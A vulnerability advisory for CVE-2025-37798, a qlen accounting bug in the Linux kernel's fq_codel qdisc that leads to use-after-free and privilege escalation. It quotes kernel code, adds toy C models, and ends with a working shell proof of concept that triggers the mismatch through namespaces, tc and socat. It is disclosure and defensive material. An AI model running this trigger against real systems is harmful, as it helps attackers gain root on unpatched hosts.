(CVE-2025-37798) Linux Kernel fq_codel_dequeue qlen Mismatch Leading to Use-After-Free and Local Privilege Escalation
CVE: CVE-2025-37798
Affected Versions: Linux kernel 3.5 through 6.15-rc1
CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
| Product | Linux Kernel (net_sched) |
|---|---|
| Vendor | Linux Kernel |
| Severity | High — a local unprivileged attacker may exploit this to achieve local privilege escalation |
| Affected Versions | Linux kernel 3.5 through 6.15-rc1 |
| CVE Identifier | CVE-2025-37798 |
| CVE Description | A qlen mismatch in the Linux kernel fq_codel dequeue path allows dropped packets to go unreported to the parent qdisc, leading to a use-after-free and local privilege escalation |
| CWE Classification(s) | CWE-416: Use After Free |
CVSS4.0 Scoring System
Base Score: 8.5
Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
| Metric | Value |
|---|---|
| Attack Vector (AV) | Local |
| Attack Complexity (AC) | Low |
| Attack Requirements (AT) | None |
| Privileges Required (PR) | Low |
| User Interaction (UI) | None |
| Vulnerable System Confidentiality (VC) | High |
| Vulnerable System Integrity (VI) | High |
| Vulnerable System Availability (VA) | High |
| Subsequent System Confidentiality (SC) | None |
| Subsequent System Integrity (SI) | None |
| Subsequent System Availability (SA) | None |
Technical Details
A use-after-free vulnerability in the Linux kernel network scheduler (net_sched) subsystem can be exploited to achieve local privilege escalation. By manipulating the maximum transmission unit (MTU) of a network interface, an attacker can cause fq_codel_dequeue() to drop packets without notifying the parent qdisc. This corrupts the parent's qlen tracking, which allows classes to be removed while the parent still references them, resulting in a use-after-free. We recommend upgrading to a kernel that includes commit 342debc12183b51773b3345ba267e9263bdfaaef.
The vulnerability lies in the fq_codel_dequeue() function.
skb = codel_dequeue(sch, &sch->qstats.backlog, &q->cparams,
                    &flow->cvars, &q->cstats, qdisc_pkt_len,
                    codel_get_enqueue_time, drop_func, dequeue_func); // [1]
if (!skb) {
    if ((head == &q->new_flows) && !list_empty(&q->old_flows))
        list_move_tail(&flow->flowchain, &q->old_flows);
    else
        list_del_init(&flow->flowchain);
    goto begin;
}
qdisc_bstats_update(sch, skb);
flow->deficit -= qdisc_pkt_len(skb);
if (q->cstats.drop_count && sch->q.qlen) { // [2]
    qdisc_tree_reduce_backlog(sch, q->cstats.drop_count, // [3]
                              q->cstats.drop_len);
    q->cstats.drop_count = 0;
    q->cstats.drop_len = 0;
}
return skb;
At [1], codel_dequeue() will dequeue a single packet. However, if certain conditions ([4]) are met, it will also drop a number of packets ([5]).
drop = codel_should_drop(skb, ctx, vars, params, stats,
                         skb_len_func, skb_time_func, backlog, now); // [4]
// ...
} else if (drop) {
    u32 delta;
    if (params->ecn && INET_ECN_set_ce(skb)) {
        stats->ecn_mark++;
    } else {
        stats->drop_len += skb_len_func(skb);
        drop_func(skb, ctx);
        stats->drop_count++; // [5]
        skb = dequeue_func(vars, ctx);
        drop = codel_should_drop(skb, ctx, vars, params,
                                 stats, skb_len_func,
                                 skb_time_func, backlog, now);
    }
    vars->dropping = true;
    delta = vars->count - vars->lastcount;
    if (delta > 1 &&
        codel_time_before(now - vars->drop_next,
                          16 * params->interval)) {
        vars->count = delta;
        codel_Newton_step(vars);
    } else {
        vars->count = 1;
        vars->rec_inv_sqrt = ~0U >> REC_INV_SQRT_SHIFT;
    }
    vars->lastcount = vars->count;
    vars->drop_next = codel_control_law(now, params->interval,
                                        vars->rec_inv_sqrt);
}
The number of dropped packets is maintained in drop_count. The check at [2] tests whether any packets were dropped and, additionally, whether the qdisc is still non-empty (non-zero qlen). The parent qdisc is notified of the dropped packets at [3] only if both conditions hold.
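To make the accounting problem concrete, the following is a minimal userspace sketch, not kernel code. The `toy_*` names and the `gate_on_qlen` flag are hypothetical and exist only for illustration. The model assumes that the parent counts every queued packet and learns about drops only through a call that stands in for qdisc_tree_reduce_backlog().

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy stand-in for a qdisc; NOT the kernel's struct Qdisc. */
struct toy_qdisc {
    unsigned int qlen;        /* packets this qdisc believes it holds */
    unsigned int drop_count;  /* drops not yet reported upward */
    struct toy_qdisc *parent; /* NULL for the root */
};

/* Stand-in for qdisc_tree_reduce_backlog(): tell every ancestor about n drops. */
static void toy_tree_reduce_backlog(struct toy_qdisc *sch, unsigned int n)
{
    for (struct toy_qdisc *p = sch->parent; p != NULL; p = p->parent) {
        assert(p->qlen >= n);
        p->qlen -= n;
    }
}

/*
 * One child dequeue call that drops `dropped` packets and returns one more.
 * gate_on_qlen == true models the check at [2] (drop_count && qlen);
 * gate_on_qlen == false reports the drops unconditionally.
 */
static void toy_child_dequeue(struct toy_qdisc *sch, unsigned int dropped,
                              bool gate_on_qlen)
{
    assert(sch->qlen >= dropped + 1);
    sch->qlen -= dropped + 1;
    sch->drop_count += dropped;

    if (sch->drop_count && (!gate_on_qlen || sch->qlen)) {
        toy_tree_reduce_backlog(sch, sch->drop_count);
        sch->drop_count = 0;
    }
}

/*
 * Queue `queued` packets in a child, then perform a single parent dequeue in
 * which the child drops all but the last packet. Returns the number of
 * packets the parent still believes are queued although the child is empty.
 */
static unsigned int toy_stale_parent_qlen(unsigned int queued, bool gate_on_qlen)
{
    assert(queued >= 1);
    struct toy_qdisc parent = { .qlen = queued, .drop_count = 0, .parent = NULL };
    struct toy_qdisc child = { .qlen = queued, .drop_count = 0, .parent = &parent };

    toy_child_dequeue(&child, queued - 1, gate_on_qlen);
    parent.qlen -= 1; /* the parent accounts for the packet it received */
    return parent.qlen;
}
```

With two packets queued, `toy_stale_parent_qlen(2, true)` models a call that drops one packet and returns the other: the child ends at qlen 0 while the parent still counts 1 packet. With `gate_on_qlen` set to `false`, the drop is reported and the parent ends at 0.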
By triggering the drop conditions in codel_dequeue() so that the drops empty the fq_codel qdisc, an attacker can create a qlen mismatch between the fq_codel qdisc and its parent. This can be achieved by manipulating the MTU of the network interface that the qdisc is attached to. The following conditions in codel_should_drop() must be satisfied.
skb_len = skb_len_func(skb);
vars->ldelay = now - skb_time_func(skb);
if (unlikely(skb_len > stats->maxpacket))
    stats->maxpacket = skb_len;
if (codel_time_before(vars->ldelay, params->target) ||
    *backlog <= params->mtu) { // [6]
    /* went below - stay below for at least interval */
    vars->first_above_time = 0;
    return false;
}
ok_to_drop = false;
if (vars->first_above_time == 0) { // [7]
    /* just went above from below. If we stay above
     * for at least interval we'll say it's ok to drop
     */
    vars->first_above_time = now + params->interval;
} else if (codel_time_after(now, vars->first_above_time)) {
    ok_to_drop = true;
}
return ok_to_drop;
For [6], params->mtu is the MTU of the network interface at the time the qdisc is created. If the interface MTU is increased after the qdisc has been created, a packet larger than params->mtu can be sent, and the check passes even with a single packet left in the backlog. This allows packets to be dropped until the qdisc is empty.
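The check at [6] and the timer at [7] can be modelled in isolation. The sketch below is a simplified userspace rendition under stated assumptions: the `toy_*` names are hypothetical, time is a plain 32-bit counter, and the byte counts used in the usage note (1500, 2000, 65536) are illustrative and ignore link-layer header overhead.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, reduced versions of the CoDel state used by the checks. */
struct toy_codel_vars {
    uint32_t first_above_time; /* 0 means "not armed" */
};

struct toy_codel_params {
    uint32_t target;   /* acceptable sojourn time */
    uint32_t interval; /* how long the delay must stay above target */
    uint32_t mtu;      /* captured once, when the qdisc is created */
};

/* Wrap-safe time comparisons on a 32-bit counter. */
static bool toy_time_after(uint32_t a, uint32_t b)
{
    return (int32_t)(a - b) > 0;
}

static bool toy_time_before(uint32_t a, uint32_t b)
{
    return toy_time_after(b, a);
}

/*
 * Simplified model of the decision in codel_should_drop().
 * `sojourn` is how long the packet waited; `backlog` is the number of
 * bytes still queued when the decision is made.
 */
static bool toy_should_drop(struct toy_codel_vars *vars,
                            const struct toy_codel_params *params,
                            uint32_t sojourn, uint32_t backlog, uint32_t now)
{
    assert(vars != NULL && params != NULL);

    /* [6]: a short delay or a backlog of at most one "MTU" means no drop. */
    if (toy_time_before(sojourn, params->target) || backlog <= params->mtu) {
        vars->first_above_time = 0;
        return false;
    }

    /* [7]: the first time above target only arms the timer. */
    if (vars->first_above_time == 0) {
        vars->first_above_time = now + params->interval;
        return false;
    }
    return toy_time_after(now, vars->first_above_time);
}
```

With `mtu = 1500` and a backlog of 2000 bytes, which a single large packet can produce, the first call arms `first_above_time` and returns false, and a later call returns true. With `mtu = 65536`, the same backlog always takes the early return at [6], so no drop is triggered.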
The qlen mismatch can be turned into a UAF in a classful parent qdisc (such as drr), as described in earlier reports, e.g. https://web.git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=638ba5089324796c2ee49af10427459c2de35f71 and https://web.git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=647cef20e649c576dff271e018d5d15d998b629d. The UAF can then be escalated into an LPE.
Proof of Concept
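# New user and network namespaces, so an unprivileged user can configure qdiscs on lo
unshare -rn
ip link set dev lo up
# Classful drr root with two classes
tc qdisc add dev lo handle 1:0 root drr
tc class add dev lo classid 1:1 drr
tc class add dev lo classid 1:2 drr
# Class 1:1 gets a plug qdisc, which holds its packets until released
tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024
# Create fq_codel while the MTU is 1500, then raise the MTU so larger packets can be queued
ip link set dev lo mtu 1500
tc qdisc add dev lo parent 1:2 handle 3:0 fq_codel target 1 interval 1 flows 1
ip link set dev lo mtu 65536
# One packet to class 1:1 (priority 0x10001), buffered by plug
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))
# Three packets with a 2000-byte payload to class 1:2 (priority 0x10002), queued in fq_codel
for i in {1..3}; do
    echo -n "$(printf '%2000s')" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10002))
done
# Release the plug so that dequeueing resumes
tc qdisc change dev lo handle 2:0 plug release_indefinite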
Fix
Upgrade to a kernel that includes commit 342debc12183b51773b3345ba267e9263bdfaaef.
Credit
Gerrard Tai of STAR Labs SG Pte. Ltd.
Timeline
- 2025-03-07 — Reported to Linux Kernel Security Team
- 2025-05-02 — CVE-2025-37798 published